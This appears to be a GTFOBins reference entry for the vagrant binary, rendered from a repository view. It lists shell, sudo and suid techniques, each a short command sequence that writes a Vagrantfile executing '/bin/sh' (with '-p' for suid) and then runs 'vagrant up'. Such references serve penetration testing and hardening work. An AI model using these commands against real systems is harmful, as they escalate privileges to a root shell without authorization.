GTFOBins.github.io/_gtfobins/vagrant.md
2023-04-14 09:00:55 +02:00

445 B

description functions
This allows to execute [`ruby`](/gtfobins/ruby/) code, other functions may apply.
shell sudo suid
code
cd $(mktemp -d) echo 'exec "/bin/sh"' > Vagrantfile vagrant up
code
cd $(mktemp -d) echo 'exec "/bin/sh"' > Vagrantfile vagrant up
code
cd $(mktemp -d) echo 'exec "/bin/sh -p"' > Vagrantfile vagrant up